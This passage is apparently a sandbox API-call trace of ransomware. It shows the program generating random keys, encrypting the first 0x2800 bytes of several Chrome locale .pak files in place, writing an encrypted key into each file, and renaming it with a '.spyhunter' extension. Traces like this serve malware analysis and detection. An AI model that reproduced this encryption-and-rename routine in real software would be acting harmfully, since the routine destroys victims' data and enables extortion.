lpMem=0x2ece380 | out: hHeap=0x2c0000) returned 1 [0175.806] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e4a8 | out: pbBuffer=0x270e4a8) returned 1 [0175.806] GetProcessHeap () returned 0x2c0000 [0175.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0175.806] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e4a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e4a0*=0x30) returned 1 [0175.806] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sr.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\sr.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0175.807] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sr.pak") returned 81 [0175.807] StrStrW (lpFirst="sr.pak", lpSrch=".txt") returned 0x0 [0175.807] GetProcessHeap () returned 0x2c0000 [0175.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0175.807] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e464, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270e464*=0x2800, lpOverlapped=0x0) returned 1 [0175.828] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0175.828] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e464, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270e464*=0x2800, lpOverlapped=0x0) returned 1 [0175.828] GetProcessHeap () returned 0x2c0000 [0175.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0175.828] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.829] WriteFile (in: hFile=0x178, lpBuffer=0x270e4a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e464, lpOverlapped=0x0 | out: lpBuffer=0x270e4a4*, lpNumberOfBytesWritten=0x270e464*=0x4, lpOverlapped=0x0) returned 1 [0175.943] WriteFile (in: hFile=0x178, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e464, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e464*=0x30, lpOverlapped=0x0) returned 1 [0175.943] CloseHandle (hObject=0x178) returned 1 [0175.943] GetProcessHeap () returned 0x2c0000 [0175.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0175.943] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sr.pak.spyhunter") returned 91 [0175.943] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sr.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\sr.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sr.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\sr.pak.spyhunter")) returned 1 [0175.945] GetProcessHeap () returned 0x2c0000 [0175.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0175.945] GetProcessHeap () returned 0x2c0000 [0175.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0175.945] GetProcessHeap () returned 0x2c0000 [0175.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecded0 | out: hHeap=0x2c0000) returned 1 [0175.945] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e4a0 | out: pbBuffer=0x270e4a0) returned 1 [0175.945] GetProcessHeap () returned 0x2c0000 [0175.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0175.945] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e498*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e498*=0x30) returned 1 [0175.945] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sk.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\sk.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0175.946] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sk.pak") returned 81 [0175.947] StrStrW (lpFirst="sk.pak", lpSrch=".txt") returned 0x0 [0175.947] GetProcessHeap () returned 0x2c0000 [0175.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0175.947] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e45c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e45c*=0x2800, lpOverlapped=0x0) returned 1 [0175.990] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0175.990] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e45c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e45c*=0x2800, lpOverlapped=0x0) returned 1 [0175.990] GetProcessHeap () returned 0x2c0000 [0175.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0175.990] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.991] WriteFile (in: hFile=0x178, lpBuffer=0x270e49c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e45c, lpOverlapped=0x0 | out: lpBuffer=0x270e49c*, lpNumberOfBytesWritten=0x270e45c*=0x4, lpOverlapped=0x0) returned 1 [0176.029] WriteFile (in: hFile=0x178, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e45c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e45c*=0x30, lpOverlapped=0x0) returned 1 [0176.029] CloseHandle (hObject=0x178) returned 1 [0176.029] GetProcessHeap () returned 0x2c0000 [0176.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0176.029] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sk.pak.spyhunter") returned 91 [0176.029] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sk.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\sk.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sk.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\sk.pak.spyhunter")) returned 1 [0176.030] GetProcessHeap () returned 0x2c0000 [0176.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0176.030] GetProcessHeap () returned 0x2c0000 [0176.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0176.030] GetProcessHeap () returned 0x2c0000 [0176.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecdcd0 | out: hHeap=0x2c0000) returned 1 [0176.030] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e4a0 | out: pbBuffer=0x270e4a0) returned 1 [0176.030] GetProcessHeap () returned 0x2c0000 [0176.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0176.030] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e498*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e498*=0x30) returned 1 [0176.030] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\pt-PT.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\pt-pt.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0176.031] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\pt-PT.pak") returned 84 [0176.031] StrStrW (lpFirst="pt-PT.pak", lpSrch=".txt") returned 0x0 [0176.031] GetProcessHeap () returned 0x2c0000 [0176.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0176.031] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e45c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e45c*=0x2800, lpOverlapped=0x0) returned 1 [0176.149] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0176.149] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e45c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e45c*=0x2800, lpOverlapped=0x0) returned 1 [0176.149] GetProcessHeap () returned 0x2c0000 [0176.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0176.149] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.149] WriteFile (in: hFile=0x178, lpBuffer=0x270e49c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e45c, lpOverlapped=0x0 | out: lpBuffer=0x270e49c*, lpNumberOfBytesWritten=0x270e45c*=0x4, lpOverlapped=0x0) returned 1 [0176.229] WriteFile (in: hFile=0x178, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e45c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e45c*=0x30, lpOverlapped=0x0) returned 1 [0176.229] CloseHandle (hObject=0x178) returned 1 [0176.258] GetProcessHeap () returned 0x2c0000 [0176.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0176.259] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\pt-PT.pak.spyhunter") returned 94 [0176.259] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\pt-PT.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\pt-pt.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\pt-PT.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\pt-pt.pak.spyhunter")) returned 1 [0176.260] GetProcessHeap () returned 0x2c0000 [0176.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0176.260] GetProcessHeap () returned 0x2c0000 [0176.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0176.260] GetProcessHeap () returned 0x2c0000 [0176.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eca5a0 | out: hHeap=0x2c0000) returned 1 [0176.260] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e498 | out: pbBuffer=0x270e498) returned 1 [0176.260] GetProcessHeap () returned 0x2c0000 [0176.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0176.261] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e490*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e490*=0x30) returned 1 [0176.261] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\lv.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\lv.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0176.262] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\lv.pak") returned 81 [0176.262] StrStrW (lpFirst="lv.pak", lpSrch=".txt") returned 0x0 [0176.262] GetProcessHeap () returned 0x2c0000 [0176.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0176.262] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e454, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e454*=0x2800, lpOverlapped=0x0) returned 1 [0176.349] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0176.349] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e454, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e454*=0x2800, lpOverlapped=0x0) returned 1 [0176.349] GetProcessHeap () returned 0x2c0000 [0176.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0176.350] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.350] WriteFile (in: hFile=0x178, lpBuffer=0x270e494*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e454, lpOverlapped=0x0 | out: lpBuffer=0x270e494*, lpNumberOfBytesWritten=0x270e454*=0x4, lpOverlapped=0x0) returned 1 [0176.363] WriteFile (in: hFile=0x178, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e454, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e454*=0x30, lpOverlapped=0x0) returned 1 [0176.364] CloseHandle (hObject=0x178) returned 1 [0176.364] GetProcessHeap () returned 0x2c0000 [0176.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0176.364] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\lv.pak.spyhunter") returned 91 [0176.364] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\lv.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\lv.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\lv.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\lv.pak.spyhunter")) returned 1 [0176.365] GetProcessHeap () returned 0x2c0000 [0176.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0176.366] GetProcessHeap () returned 0x2c0000 [0176.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0176.366] GetProcessHeap () returned 0x2c0000 [0176.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecd460 | out: hHeap=0x2c0000) returned 1 [0176.366] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e498 | out: pbBuffer=0x270e498) returned 1 [0176.366] GetProcessHeap () returned 0x2c0000 [0176.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0176.366] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e490*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e490*=0x30) returned 1 [0176.366] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\hu.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\hu.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0176.370] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\hu.pak") returned 81 [0176.370] StrStrW (lpFirst="hu.pak", lpSrch=".txt") returned 0x0 [0176.370] GetProcessHeap () returned 0x2c0000 [0176.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0176.370] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e454, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e454*=0x2800, lpOverlapped=0x0) returned 1 [0176.390] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0176.390] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e454, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e454*=0x2800, lpOverlapped=0x0) returned 1 [0176.390] GetProcessHeap () returned 0x2c0000 [0176.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0176.390] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.390] WriteFile (in: hFile=0x178, lpBuffer=0x270e494*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e454, lpOverlapped=0x0 | out: lpBuffer=0x270e494*, lpNumberOfBytesWritten=0x270e454*=0x4, lpOverlapped=0x0) returned 1 [0176.402] WriteFile (in: hFile=0x178, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e454, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e454*=0x30, lpOverlapped=0x0) returned 1 [0176.402] CloseHandle (hObject=0x178) returned 1 [0176.416] GetProcessHeap () returned 0x2c0000 [0176.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0176.416] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\hu.pak.spyhunter") returned 91 [0176.416] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\hu.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\hu.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\hu.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\hu.pak.spyhunter")) returned 1 [0176.417] GetProcessHeap () returned 0x2c0000 [0176.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0176.417] GetProcessHeap () returned 0x2c0000 [0176.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0176.417] GetProcessHeap () returned 0x2c0000 [0176.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eccdd0 | out: hHeap=0x2c0000) returned 1 [0176.417] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e490 | out: pbBuffer=0x270e490) returned 1 [0176.417] GetProcessHeap () returned 0x2c0000 [0176.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0176.418] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e488*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e488*=0x30) returned 1 [0176.418] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\fr.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\fr.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0176.418] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\fr.pak") returned 81 [0176.418] StrStrW (lpFirst="fr.pak", lpSrch=".txt") returned 0x0 [0176.418] GetProcessHeap () returned 0x2c0000 [0176.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0176.418] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e44c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e44c*=0x2800, lpOverlapped=0x0) returned 1 [0176.420] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0176.420] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e44c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e44c*=0x2800, lpOverlapped=0x0) returned 1 [0176.420] GetProcessHeap () returned 0x2c0000 [0176.420] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0176.420] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.420] WriteFile (in: hFile=0xa0, lpBuffer=0x270e48c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e44c, lpOverlapped=0x0 | out: lpBuffer=0x270e48c*, lpNumberOfBytesWritten=0x270e44c*=0x4, lpOverlapped=0x0) returned 1 [0176.455] WriteFile (in: hFile=0xa0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e44c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e44c*=0x30, lpOverlapped=0x0) returned 1 [0176.455] CloseHandle (hObject=0xa0) returned 1 [0176.456] GetProcessHeap () returned 0x2c0000 [0176.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0176.456] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\fr.pak.spyhunter") returned 91 [0176.456] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\fr.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\fr.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\fr.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\fr.pak.spyhunter")) returned 1 [0176.457] GetProcessHeap () returned 0x2c0000 [0176.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0176.457] GetProcessHeap () returned 0x2c0000 [0176.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0176.457] GetProcessHeap () returned 0x2c0000 [0176.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecc920 | out: hHeap=0x2c0000) returned 1 [0176.457] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e490 | out: pbBuffer=0x270e490) returned 1 [0176.457] GetProcessHeap () returned 0x2c0000 [0176.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0176.457] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e488*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e488*=0x30) returned 1 [0176.457] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\et.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\et.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0176.458] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\et.pak") returned 81 [0176.458] StrStrW (lpFirst="et.pak", lpSrch=".txt") returned 0x0 [0176.458] GetProcessHeap () returned 0x2c0000 [0176.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0176.458] ReadFile (in: 